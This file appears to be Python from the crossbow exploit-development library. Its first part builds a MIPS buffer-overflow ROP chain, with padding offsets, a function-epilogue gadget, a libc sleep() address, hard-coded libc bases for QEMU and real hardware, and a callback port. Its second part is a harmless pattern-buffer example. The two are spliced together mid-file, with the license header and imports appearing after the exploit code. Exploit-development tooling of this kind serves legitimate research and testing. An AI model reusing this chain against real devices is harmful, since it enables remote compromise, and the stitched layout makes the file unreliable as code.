# Exploit buffer layout for a MIPS target: pad to the saved return address, chain a
# function-epilogue gadget into libc's sleep(), and pad again to the slot that lands
# in $s2.  Everything below runs at import time and mutates the module-level `buf`.
#
# NOTE(review): the gadget and sleep() values passed to add_rop_gadget() look like
# libc-relative offsets that the builder rebases against default_base — confirm in
# EmptyOverflowBuffer.  The two hard-coded bases only hold if the target maps libc
# deterministically (no ASLR); verify on the actual device before relying on them.

CALLBACK_PORT = "8080"

# Select the libc base: QEMU user-mode emulation maps libc at a different address
# than the real hardware does.
qemu = False
libc_qemu_base = 0x4084a000
libc_actual_base = 0x2aaee000
libc_base = libc_qemu_base if qemu else libc_actual_base

# Bytes that must not appear in the buffer.  The list mixes one-character strings and
# integer codes, exactly as the builder is given them — presumably it accepts both
# forms; confirm against the badchar check in EmptyOverflowBuffer.
badchars = ['\0', 0x0d, '\n', 0x20]

buf = EmptyOverflowBuffer(
    LittleEndian,
    default_base=libc_base,
    badchars=badchars,
    maxlength=2048,
)


def _pad_to(target_offset):
    """Extend `buf` with pattern bytes until its length reaches `target_offset`."""
    buf.add_pattern(target_offset - buf.len())


# Filler up to the controlled return address slot.
buf.add_pattern(528)

# function_epilogue_rop: lands in $ra; the epilogue restores $s1-$s7 from the stack,
# giving us control of those registers for the next gadget.
buf.add_rop_gadget(
    0x31b44,
    description="[$ra] function epilogue that sets up $s1-$s7",
)
_pad_to(620)

# Address of sleep() in libc; $ra and $a0 must already be set up when it is reached.
buf.add_rop_gadget(
    0x506c0,
    description="Address of sleep() in libc. be sure to set up $ra and $a0 before calling.",
)
_pad_to(628)

# Next: a placeholder address that can be dereferenced without crashing; this value
# ends up in $s2.
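# - Tactical Network Solutions, LLC
#
# See LICENSE.txt for more details.
#
# Example script: build an empty (pattern-only) overflow buffer, print its section
# layout, and look up the offset of a pattern fragment.  Originally written for
# Python 2 (print statement); print() with a single argument behaves the same there.
import sys
import os

# Put the crossbow package (one directory above this script) on the import path.
# Resolve it from this file's location, not the current working directory: the
# original os.path.abspath('..') only worked when the script was launched from its
# own directory, and otherwise pushed an arbitrary caller-relative '..' to the front
# of sys.path, letting an unrelated `crossbow` package shadow the intended one.
sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))

from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer
from crossbow.common.support import BigEndian
from crossbow.common.support import Logging

logger = Logging()

logger.LOG_INFO("Creating empty overflow buffer")
# 'A', 'B' and '6' are excluded so the generated pattern visibly avoids them.
buf = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])
buf.add_pattern(1024)
logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len())

buf.print_section_descriptions()
print(buf.pretty_string())

# Look up where a four-byte pattern fragment sits in the buffer (the same lookup an
# analyst does with the bytes recovered from a crashed register or stack slot).
logger.LOG_INFO("Offset of \"u3Au4\": %d" % buf.find_offset("u3Au4"))

logger.LOG_INFO("Creating second empty overflow buffer")
buf2 = EmptyOverflowBuffer(BigEndian, badchars=['A', 'B', '6'])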